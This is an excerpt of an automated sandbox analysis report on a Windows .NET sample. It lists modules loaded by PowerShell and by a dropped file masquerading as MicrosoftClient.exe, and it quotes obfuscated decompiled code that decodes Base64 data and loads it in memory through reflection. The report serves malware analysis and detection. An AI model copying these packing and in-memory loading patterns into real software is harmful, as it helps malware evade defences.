                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: 9RgE5uOJwX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: 9RgE5uOJwX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                          Data Obfuscation

                          barindex
                          .NET source code contains method to dynamically call methods (often used by packers)
                          Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.Ux0hBpfswygkfwIAaDV2LgRcw3hXBRS3geLIglSv,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cad9pd9UPvHp11geHOoKHnvh8Jb4VnBCf0GQ2wIg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.R3QwhNyok9sKs1bcp9YKhGlPL4LSqJ7wM4wt8ROg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.wLZzW8rYyNJoZccerS4YJsbfYv62GWnDm7InJplR,NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.HKkbHp8Ip0osbW5qkheNNa6i0pKHRJ2esR5cWRft8ZL7HGZP9zH1FAFnry()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UtSwHbP8M24sTP6TQWiCOVnJW[2],NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.ZL3IIKzRyFMNczhjFRLJp7P5RRSngAHZDp4TR8tLjqeHYAiAGPLIEWWWEh(Convert.FromBase64String(UtSwHbP8M24sTP6TQWiCOVnJW[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { UtSwHbP8M24sTP6TQWiCOVnJW[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.Ux0hBpfswygkfwIAaDV2LgRcw3hXBRS3geLIglSv,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cad9pd9UPvHp11geHOoKHnvh8Jb4VnBCf0GQ2wIg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.R3QwhNyok9sKs1bcp9YKhGlPL4LSqJ7wM4wt8ROg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.wLZzW8rYyNJoZccerS4YJsbfYv62GWnDm7InJplR,NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.HKkbHp8Ip0osbW5qkheNNa6i0pKHRJ2esR5cWRft8ZL7HGZP9zH1FAFnry()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UtSwHbP8M24sTP6TQWiCOVnJW[2],NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.ZL3IIKzRyFMNczhjFRLJp7P5RRSngAHZDp4TR8tLjqeHYAiAGPLIEWWWEh(Convert.FromBase64String(UtSwHbP8M24sTP6TQWiCOVnJW[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { UtSwHbP8M24sTP6TQWiCOVnJW[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.Ux0hBpfswygkfwIAaDV2LgRcw3hXBRS3geLIglSv,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cad9pd9UPvHp11geHOoKHnvh8Jb4VnBCf0GQ2wIg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.R3QwhNyok9sKs1bcp9YKhGlPL4LSqJ7wM4wt8ROg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.wLZzW8rYyNJoZccerS4YJsbfYv62GWnDm7InJplR,NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.HKkbHp8Ip0osbW5qkheNNa6i0pKHRJ2esR5cWRft8ZL7HGZP9zH1FAFnry()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UtSwHbP8M24sTP6TQWiCOVnJW[2],NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.ZL3IIKzRyFMNczhjFRLJp7P5RRSngAHZDp4TR8tLjqeHYAiAGPLIEWWWEh(Convert.FromBase64String(UtSwHbP8M24sTP6TQWiCOVnJW[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { UtSwHbP8M24sTP6TQWiCOVnJW[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                          .NET source code contains potential unpacker
                          Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: hi8i65wpblvGWk5oXoxjBQ3BH System.AppDomain.Load(byte[])
                          Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: Q9w40NAKVylkpLnEtwd22aJdY System.AppDomain.Load(byte[])
                          Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: Q9w40NAKVylkpLnEtwd22aJdY
                          Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: hi8i65wpblvGWk5oXoxjBQ3BH System.AppDomain.Load(byte[])
                          Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: Q9w40NAKVylkpLnEtwd22aJdY System.AppDomain.Load(byte[])
                          Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: Q9w40NAKVylkpLnEtwd22aJdY
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: hi8i65wpblvGWk5oXoxjBQ3BH System.AppDomain.Load(byte[])
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: Q9w40NAKVylkpLnEtwd22aJdY System.AppDomain.Load(byte[])
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs.Net Code: Q9w40NAKVylkpLnEtwd22aJdY
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeCode function: 0_2_00007FFD343D00BD pushad ; iretd 0_2_00007FFD343D00C1
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeCode function: 0_2_00007FFD343D8908 push E95D0F61h; ret 0_2_00007FFD343D8929
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD342ED2A5 pushad ; iretd 2_2_00007FFD342ED2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD344000BD pushad ; iretd 2_2_00007FFD344000C1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD344D2316 push 8B485F91h; iretd 2_2_00007FFD344D231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD342CD2A5 pushad ; iretd 5_2_00007FFD342CD2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD343E00BD pushad ; iretd 5_2_00007FFD343E00C1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD344B2316 push 8B485F93h; iretd 5_2_00007FFD344B231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD342BD2A5 pushad ; iretd 8_2_00007FFD342BD2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD343D00BD pushad ; iretd 8_2_00007FFD343D00C1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD343D19D2 pushad ; ret 8_2_00007FFD343D19E1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD344A2316 push 8B485F94h; iretd 8_2_00007FFD344A231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD342BD2A5 pushad ; iretd 11_2_00007FFD342BD2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD343D00BD pushad ; iretd 11_2_00007FFD343D00C1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD344A2316 push 8B485F94h; iretd 11_2_00007FFD344A231B
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeCode function: 13_2_00007FFD344000BD pushad ; iretd 13_2_00007FFD344000C1
                          Source: C:\Users\user\AppData\Local\MicrosoftClient.exeCode function: 14_2_00007FFD343E00BD pushad ; iretd 14_2_00007FFD343E00C1
                          Source: 9RgE5uOJwX.exe, i1P5h3Yf5OnQi96hdLePtGoWhHPkDOJ9r7kQ4YJe6VnvuDEoTVZTFpXOCE.csHigh entropy of concatenated method names: 'ahkLBtcIAydoos0eu62oegKUfAo0SL3L9OD9j2T3JLmGzukbiyeKgLjCSPKg4EYgBnIBxgYtCh0xAeXwNQlEbGdFkA', 'AGw2v2oTlbKKwP5x54MXxcVDYqGPGQpRJipwdHpXHBPAMHi11we4uShSDNBrFuQYexAzu229tcRWrDyimxgzbdEdn7', 'e8sRBQTSKmYnc600qDRn7HAtf9sdYePcpIyv99Zf7KCV6zwVt7RnAo8eGU2j4VbptR4g0yX4svG23wpswKCHRHf2El', 'G2vZaPROQB58OHc93Il4EOQ6qitlnHPGbfidlAllzOQqJ2sZ5skIm', 'WVUPcFQrakwet0BYu6RZOeDnQflzSLDp128QAwVFA2AyCfVhtUp5Y', 'Lk39O2yY6bC2uVjbl0usdQMVKri6n206tM5wIieecU7Hyvy43bY15', 'z1HABQCPwrT0YomXKTfqflk7r7iysVNf40rvYabHoqgiu8hMl5Uf7', 'UUzA3oHXZI6sx4VEhyLrPn3QHw84Px1L7j3ZqKyf05vdV3dBh1tsj', '_2PEvelOuIaYGA3OZocilsXC0IPXEKv3yr4BL6LRL6tZ5PfEKN4cTV', 'JgxDH0Jzmif2muKohDfTiZUT1Ls0cCaHTxkK9yDyY7Vc7wiCfZ7cR'
                          Source: 9RgE5uOJwX.exe, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.csHigh entropy of concatenated method names: 'jhqnO08Zvk17ev11zCn1tDNyTKV4wrZCE3H2RZPlHLutZ98jo9', 'V9mLFi4rb3GvXaL6EBDv0B8HJqs2WFhtPa3AH0lHf3A2pMXVYJ', 'GgcZLQqItYEUYNnNAZ4QKz0diL9fvAuCxQNymlrnZH4nl6sfyR', '_5nEc0S8xY9P4Ra53Ss7UIayp6ClaHO5HD3EtyBzzym99uzNybf'
                          Source: 9RgE5uOJwX.exe, CwgUWtA4EqaTAVKSuJbX5wXDfQHTFQ9u4KFXlf86FrRhdWOZZe4aaCgE6NOsP5wgybmILD80wDyjoLU0jDcqZlnSHBFP4AoybT.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'l7QqVOpv5orfSsK1rVePRY0QScELJRgtOU5S5qrR06ts0FGeXA', 'IMuVwxQ7PzQdOPdwzfvWABKRWs1TXTTNssoFw13dzaRdqhx3JW', 'k2S4f9gpgfpnL665tp9amMtsA5IoP9uFBFbPCgEiwTaSyeTujL', 'kH08bywJ8b6ETVolDtOEmOuJegDH2sdJ14AtxT8fI4GzS2JAOc'
                          Source: 9RgE5uOJwX.exe, LYQIWx0vxxudRlTzfQ0waGDKlqkAgcH7WUyA3eq2.csHigh entropy of concatenated method names: 'aN8VYkhc0BO34AMF7GwwtAcuEMi8gpLKT0sBVyiJ', 'KF4fWkhGpT0A9Qn818SJnpIJCk1h3stAQcgmNpxB', 'jurUB02cOltjuscD09WWl8F1Os4OJSMGfVHBLrPf', 'u84FUlA8UhiU1Ck0UM3rIdd33UupfVmcENg241d6', 'zBH2q54hjV8xSrFrXE0yEeezAvcde6pR0qEcNUvC', 'Bwlz4YPX68j6SXY3g8EzLyZdsBilO2ilgtMsNFpqHfzWZPH0a1', 'LIScEfY7zZ9tVLYhkj7NZv4T8GgZrwbYaZlOKmPS5UN5HtzRGw', 'zhEDKhI5fm3XXvX7PbMRWPVvQKbIr6tWMUXWD4O9XGBlJ5tM1k', 'YGjf4QSiliOhMxkLAfF03TDhmB4aoUPGEtgyXyGQcXsIlLdYy8', 'JXYPkt8Jc9cHWwIZQVgseSeK4KCbc9BiY7TP3WfRiFuFzwM61c'
                          Source: 9RgE5uOJwX.exe, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.csHigh entropy of concatenated method names: 'MIC0gXm6oQLdJJNexLAZ0VfQp7AyfIaMpbOVt0M1QQZEcmxA7Sf5L9YIUN', 'xoMoqlJJoBCpUws1UFZyAVxdCo4nimVTZ1HAmCp9FfNxYDh18rUDURGbfR', 'uGU04LhSc0DLfZmkwJ41N4uQxupxiuVB5cnzQc7zH1M4R7qywoQDKi0Uc2', 'D2lsPY8vIDAUmaZv38f94w3l14oWYBUSPfO4AlTvZi42FhqpK9xjwmtVdw', 'xLaib1dRWTsno2J1oeKLMQoDEOi7lPfX9wC4ifXlivIfTlYdbKKz1lGYnh', 'maoX0CbSzaK3Rp28VcoiQMu0Yd8lXEdqZ1n97iyuyV8mnHEWcdUtMo32aR', 'Ntyhb7069wrMlb0XmKNw1PHMTQNHhD7FeCZpkZTap14DxxYTvmwaFExi5G', 'ttrAVNH6YBCZfgmZxa3WCFElLj8U1ZNOWuqbF9YWTWc0wemzUYZCmtiKvT', 'oIjsldVLmBsoVjw0x6MU9ifVuMIypjsEe6oxIf0rF11lzjDqVoi4fiHyTd', '_55PjX53gU1NTJU3tah4lib8YBCex6SJjDcIdwVC9HxM9H8ap37s1hNQ2T5'
                          Source: 9RgE5uOJwX.exe, YIsiQT0bVRZkgJBchQD3mj8TT.csHigh entropy of concatenated method names: '_9EKA4mmYhS5A3Vo7PQ5U8yYpV', '_3F8KZvwIIllQlPE51Q7rT7NP6', '_2MK6IwXfT4BOrv9J3aXyidWkj', '_5T1TMhB3O7StVjktbLYkSdIZp', 'iuuUZwHDvSsobqzAj4G742AIvHkq8JAEWiL', 'DlrOYOIGTZV4eJpPtea5byCrFn4zM8nublj', '_9ILnQINVxIYDQ97TVIaa9YyCpB7EXAW5tom5Es3ncPJ1lS95RaMBwRsWQNgKYutlvNo', 'VXmJfTdoGixB1E5Z1wjgTOteiJOmc6KBc4xrCsqFVbJwXC1iznjrsa7UHQE2XigNpuH', '_5wNIasIaQNeaZwCIvHyKNM1SOqS7HX3huPu0AQBwPzVGiYotwHWJSytkXkzbO10a0u5', 'NqPA5cp23835Re9M2uVQVtMMUJvNAjSqvVFtg3TUx4mDFNPZ8gLyuQYAAKvkocPUew0'
                          Source: 9RgE5uOJwX.exe, xEidHkjl3ZbqUKvIPhMdYvEBT.csHigh entropy of concatenated method names: 'BDRQ8CiLuswqAppJ4K91S5dh7YdvybCtM3VXEJxg8i33Ed3RgMAv6gmJro', '_2nTtKAoberzYJFa7yq1LShwR8iNGoNekJgkkYX6S1BcPCM8qgTL5QO4WVKcyQKvXUXx', 'CV9weyjNtLvDncWBpl6tyfl7rElfyAYbtml1wChTE2sQe7JYYGIUlJ6anqhPEQaqgxm', 'GmaE3jPyBngvX63rusAkRdVRn1ie9jYpnFfeg98CF9ox4G8MiFGJjJdguFMfwhYFN1T', '_5LiqLS0rriTlip5EnigTqlfbYT3O9Zqp992Vw5piCNSkIp7WEyJpSl0bNpEFgIiES8U'
                          Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.csHigh entropy of concatenated method names: 'LRbYTeQD7H3jkFsPe9vpLFlDK', 'hi8i65wpblvGWk5oXoxjBQ3BH', 'l54elty1mfujUEGBMp1X01hln', 'wMGCYdFEkNKYe9j3GZMkOGgBb', '_7ufBfU62R4YZocKbpyUGXuknW', 'vXnHhVT57mZluAzRt80l5DsC6', 'Xyybo5TncnAaF1HAYGa0X7pSt', 'FjPS8U7KdFCmJBM975RiRSOwG', 'q0i2kZtvL6SyvbPYW8hbQYPfk', 'PDkuHMfS9HsSe85HDqEfRBcdl'
                          Source: 9RgE5uOJwX.exe, a5vqhNcXHqNHEz8q3VSMya6o4.csHigh entropy of concatenated method names: 'tcLVTujiwrEFL1XBqaq0Gkulh', '_6YDoJioH7lq3A9fcfwP6t5FusMNbaJDowzB', 'zY6zaLyg7utnR5pYiU0cNBx8deQoNVFn4FM', 'Rpmrt7znvurUSjgCFVpoXZqCBkQRHATCDfT', 'B6vwsK21WX1UISAfEue3xQtBL56Pan3z3w4'
                          Source: 9RgE5uOJwX.exe, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.csHigh entropy of concatenated method names: '_3LFonnJfMRrLHdpajh1txoztqe85dV2AVPAe2ScC', 'A4Ca0fThPYuMM71E9HMZWq5tGxpad03yOTvETA0o', 'pcaW3zWDHX7MVjNus91u9hKz7', 'Jp9k7fXgQoYDxMbOc7uHDDsth', 'nWxxEIQKgRUY1dWWi3OQPdZ89', 'STGNxbu4HbCk1zVHeAiYEueIa', 'Qmu9tHeWTcvzanYgBmEpbSdxN', 'FpuhZCDsHlAP5KMW0BQMk5HSp', 'uCtfHWlMzsUBm2H6W1BOk8o0J', 'cMoLfn0A28VUYcraKWobh80Nc'
                          Source: MicrosoftClient.exe.0.dr, i1P5h3Yf5OnQi96hdLePtGoWhHPkDOJ9r7kQ4YJe6VnvuDEoTVZTFpXOCE.csHigh entropy of concatenated method names: 'ahkLBtcIAydoos0eu62oegKUfAo0SL3L9OD9j2T3JLmGzukbiyeKgLjCSPKg4EYgBnIBxgYtCh0xAeXwNQlEbGdFkA', 'AGw2v2oTlbKKwP5x54MXxcVDYqGPGQpRJipwdHpXHBPAMHi11we4uShSDNBrFuQYexAzu229tcRWrDyimxgzbdEdn7', 'e8sRBQTSKmYnc600qDRn7HAtf9sdYePcpIyv99Zf7KCV6zwVt7RnAo8eGU2j4VbptR4g0yX4svG23wpswKCHRHf2El', 'G2vZaPROQB58OHc93Il4EOQ6qitlnHPGbfidlAllzOQqJ2sZ5skIm', 'WVUPcFQrakwet0BYu6RZOeDnQflzSLDp128QAwVFA2AyCfVhtUp5Y', 'Lk39O2yY6bC2uVjbl0usdQMVKri6n206tM5wIieecU7Hyvy43bY15', 'z1HABQCPwrT0YomXKTfqflk7r7iysVNf40rvYabHoqgiu8hMl5Uf7', 'UUzA3oHXZI6sx4VEhyLrPn3QHw84Px1L7j3ZqKyf05vdV3dBh1tsj', '_2PEvelOuIaYGA3OZocilsXC0IPXEKv3yr4BL6LRL6tZ5PfEKN4cTV', 'JgxDH0Jzmif2muKohDfTiZUT1Ls0cCaHTxkK9yDyY7Vc7wiCfZ7cR'
                          Source: MicrosoftClient.exe.0.dr, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.csHigh entropy of concatenated method names: 'jhqnO08Zvk17ev11zCn1tDNyTKV4wrZCE3H2RZPlHLutZ98jo9', 'V9mLFi4rb3GvXaL6EBDv0B8HJqs2WFhtPa3AH0lHf3A2pMXVYJ', 'GgcZLQqItYEUYNnNAZ4QKz0diL9fvAuCxQNymlrnZH4nl6sfyR', '_5nEc0S8xY9P4Ra53Ss7UIayp6ClaHO5HD3EtyBzzym99uzNybf'
                          Source: MicrosoftClient.exe.0.dr, CwgUWtA4EqaTAVKSuJbX5wXDfQHTFQ9u4KFXlf86FrRhdWOZZe4aaCgE6NOsP5wgybmILD80wDyjoLU0jDcqZlnSHBFP4AoybT.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'l7QqVOpv5orfSsK1rVePRY0QScELJRgtOU5S5qrR06ts0FGeXA', 'IMuVwxQ7PzQdOPdwzfvWABKRWs1TXTTNssoFw13dzaRdqhx3JW', 'k2S4f9gpgfpnL665tp9amMtsA5IoP9uFBFbPCgEiwTaSyeTujL', 'kH08bywJ8b6ETVolDtOEmOuJegDH2sdJ14AtxT8fI4GzS2JAOc'
